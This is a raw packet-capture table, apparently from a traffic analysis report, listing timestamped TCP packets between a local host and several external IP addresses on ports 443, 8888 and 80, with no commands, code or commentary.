                                  Sep 26, 2024 10:55:11.561806917 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.561873913 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.561885118 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.561908960 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.561939001 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.561959028 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.562136889 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.562200069 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.562208891 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.562227011 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.562262058 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.562284946 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.562391996 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.562429905 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.562458992 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.562479019 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.562504053 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.562570095 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.562578917 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.562594891 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.562628984 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.562643051 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.562657118 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.562669039 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.562709093 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.562757015 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.562797070 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.562838078 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.562868118 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.562880993 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.562906981 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.563097954 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.573798895 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.573846102 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.573880911 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.573899984 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.573926926 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.573945045 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.574301004 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.574342012 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.574368000 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.574379921 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.574425936 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.574425936 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.575141907 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.575181961 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.575216055 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.575227976 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.575253963 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.575272083 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.646905899 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.646928072 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.646975040 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.646996975 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.647012949 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.647166014 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.647188902 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.647202969 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.647209883 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.647237062 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.647267103 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.647749901 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.647768021 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.647799969 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.647809029 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.647840023 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.647860050 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.648510933 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.648528099 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.648586988 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.648595095 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.648714066 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.649053097 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.649070978 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.649100065 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.649106026 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.649127960 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.649142027 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.660648108 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.660669088 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.660707951 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.660726070 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.660739899 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.660764933 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.661338091 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.661364079 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.661405087 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.661415100 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.661432028 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.661448002 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.662245989 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.662266016 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.662302017 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.662308931 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.662332058 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.662347078 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.733458996 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.733493090 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.733540058 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.733561993 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.733576059 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.733594894 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.733952045 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.733972073 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.734002113 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.734009027 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.734035969 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.734051943 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.734707117 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.734726906 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.734761953 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.734769106 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.734791040 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.734808922 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.735218048 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.735236883 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.735289097 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.735296011 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.735340118 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.735641956 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.735660076 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.735693932 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.735698938 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.735727072 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.735745907 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.747152090 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.747175932 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.747215986 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.747224092 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.747250080 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.747271061 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.747725964 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.747746944 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.747775078 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.747780085 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.747808933 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.747827053 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.748246908 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.748281002 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.748311996 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.748317957 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.748351097 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.748364925 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.820271015 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.820303917 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.820358992 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.820425034 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.820457935 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.820478916 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.820867062 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.820885897 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.820919037 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.820934057 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.820964098 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.821063042 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.821347952 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.821373940 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.821408987 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.821420908 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.821446896 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.821466923 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.821588039 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.821636915 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.821650028 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.821672916 CEST4434973215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:11.821727037 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:11.822077036 CEST49732443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:13.615086079 CEST497338888192.168.2.4173.208.241.155
                                  Sep 26, 2024 10:55:13.619954109 CEST888849733173.208.241.155192.168.2.4
                                  Sep 26, 2024 10:55:13.620059967 CEST497338888192.168.2.4173.208.241.155
                                  Sep 26, 2024 10:55:13.625046968 CEST497338888192.168.2.4173.208.241.155
                                  Sep 26, 2024 10:55:13.647147894 CEST888849733173.208.241.155192.168.2.4
                                  Sep 26, 2024 10:55:14.138966084 CEST888849733173.208.241.155192.168.2.4
                                  Sep 26, 2024 10:55:14.186080933 CEST497338888192.168.2.4173.208.241.155
                                  Sep 26, 2024 10:55:14.271603107 CEST888849733173.208.241.155192.168.2.4
                                  Sep 26, 2024 10:55:14.275901079 CEST497338888192.168.2.4173.208.241.155
                                  Sep 26, 2024 10:55:14.280774117 CEST888849733173.208.241.155192.168.2.4
                                  Sep 26, 2024 10:55:14.283477068 CEST497338888192.168.2.4173.208.241.155
                                  Sep 26, 2024 10:55:14.288388968 CEST888849733173.208.241.155192.168.2.4
                                  Sep 26, 2024 10:55:14.480561972 CEST888849733173.208.241.155192.168.2.4
                                  Sep 26, 2024 10:55:14.485186100 CEST497338888192.168.2.4173.208.241.155
                                  Sep 26, 2024 10:55:14.490080118 CEST888849733173.208.241.155192.168.2.4
                                  Sep 26, 2024 10:55:14.576968908 CEST888849733173.208.241.155192.168.2.4
                                  Sep 26, 2024 10:55:14.644210100 CEST4973480192.168.2.4178.237.33.50
                                  Sep 26, 2024 10:55:14.649068117 CEST8049734178.237.33.50192.168.2.4
                                  Sep 26, 2024 10:55:14.649147034 CEST4973480192.168.2.4178.237.33.50
                                  Sep 26, 2024 10:55:14.649272919 CEST4973480192.168.2.4178.237.33.50
                                  Sep 26, 2024 10:55:14.654314041 CEST8049734178.237.33.50192.168.2.4
                                  Sep 26, 2024 10:55:14.686089039 CEST497338888192.168.2.4173.208.241.155
                                  Sep 26, 2024 10:55:15.283359051 CEST8049734178.237.33.50192.168.2.4
                                  Sep 26, 2024 10:55:15.283452034 CEST4973480192.168.2.4178.237.33.50
                                  Sep 26, 2024 10:55:15.297457933 CEST497338888192.168.2.4173.208.241.155
                                  Sep 26, 2024 10:55:15.302531004 CEST888849733173.208.241.155192.168.2.4
                                  Sep 26, 2024 10:55:16.252384901 CEST8049734178.237.33.50192.168.2.4
                                  Sep 26, 2024 10:55:16.252456903 CEST4973480192.168.2.4178.237.33.50
                                  Sep 26, 2024 10:55:28.635979891 CEST49741443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:28.636025906 CEST4434974115.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:28.636102915 CEST49741443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:28.640880108 CEST49741443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:28.640893936 CEST4434974115.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:29.118973017 CEST4434974115.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:29.119076014 CEST49741443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:29.120448112 CEST49741443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:29.120467901 CEST4434974115.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:29.120791912 CEST4434974115.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:29.126256943 CEST49741443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:29.171441078 CEST4434974115.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:29.266686916 CEST4434974115.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:29.268435955 CEST4434974115.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:29.268459082 CEST4434974115.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:29.268517017 CEST49741443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:29.268537045 CEST4434974115.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:29.268553972 CEST4434974115.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:29.268582106 CEST49741443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:29.268589020 CEST4434974115.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:29.268629074 CEST49741443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:29.268635988 CEST4434974115.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:29.268687963 CEST4434974115.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:29.268735886 CEST49741443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:29.268979073 CEST49741443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:29.383917093 CEST49742443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:29.383965015 CEST4434974215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:29.384041071 CEST49742443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:29.384491920 CEST49742443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:29.384510040 CEST4434974215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:29.879519939 CEST4434974215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:29.879637003 CEST49742443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:29.882992983 CEST49742443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:29.883002043 CEST4434974215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:29.883337021 CEST4434974215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:29.885334015 CEST49742443192.168.2.415.235.85.194
                                  Sep 26, 2024 10:55:29.931432009 CEST4434974215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:30.033067942 CEST4434974215.235.85.194192.168.2.4
                                  Sep 26, 2024 10:55:30.042500973 CEST4434974215.235.85.194192.168.2.4
Timestamp                             Src Port  Dst Port  Src IP         Dst IP
Sep 26, 2024 10:55:30.042526007 CEST  443       49742     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:30.042572021 CEST  49742     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:30.042601109 CEST  443       49742     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:30.042669058 CEST  49742     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:30.124665976 CEST  443       49742     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:30.124728918 CEST  443       49742     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:30.124778986 CEST  49742     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:30.124794006 CEST  443       49742     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:30.124819040 CEST  49742     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:30.133476019 CEST  443       49742     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:30.133529902 CEST  443       49742     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:30.133552074 CEST  49742     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:30.133559942 CEST  443       49742     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:30.133595943 CEST  49742     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:30.186126947 CEST  49742     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:30.221715927 CEST  443       49742     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:30.221796036 CEST  49742     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:30.221807957 CEST  443       49742     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:30.221885920 CEST  443       49742     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:30.222004890 CEST  49742     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:30.222296953 CEST  49742     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:30.223437071 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:30.223535061 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:30.223694086 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:30.224097967 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:30.224148989 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:30.704945087 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:30.708034039 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:30.708101034 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:30.849165916 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:30.936192989 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:30.936259985 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:30.936316967 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:30.936383009 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:30.936418056 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:30.936436892 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:30.936460018 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:30.937762976 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:30.937844992 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:30.937849045 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:30.937865973 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:30.937894106 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:30.937922955 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:30.937939882 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:30.937972069 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:30.945640087 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:30.945682049 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:30.945708036 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:30.945725918 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:30.945760965 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.024224997 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.024280071 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.024305105 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.024327040 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.024353027 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.026146889 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.026166916 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.026204109 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.026209116 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.026223898 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.026245117 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.026252031 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.026293993 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.026293993 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.028309107 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.028358936 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.028388023 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.028402090 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.028434992 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.076771975 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.110023975 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.110044956 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.110085964 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.110107899 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.110131025 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.110172987 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.110172987 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.110193014 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.110403061 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.110490084 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.110534906 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.110554934 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.110568047 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.110594988 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.110645056 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.111068010 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.111108065 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.111152887 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.111171961 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.111223936 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.111243963 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.111800909 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.111845970 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.111869097 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.111896992 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.111923933 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.111949921 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.112292051 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.112358093 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.112405062 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.112416983 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.112442017 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.112467051 CEST  49743     443       192.168.2.4    15.235.85.194
Sep 26, 2024 10:55:31.115166903 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.115209103 CEST  443       49743     15.235.85.194  192.168.2.4
Sep 26, 2024 10:55:31.115255117 CEST  49743     443       192.168.2.4    15.235.85.194
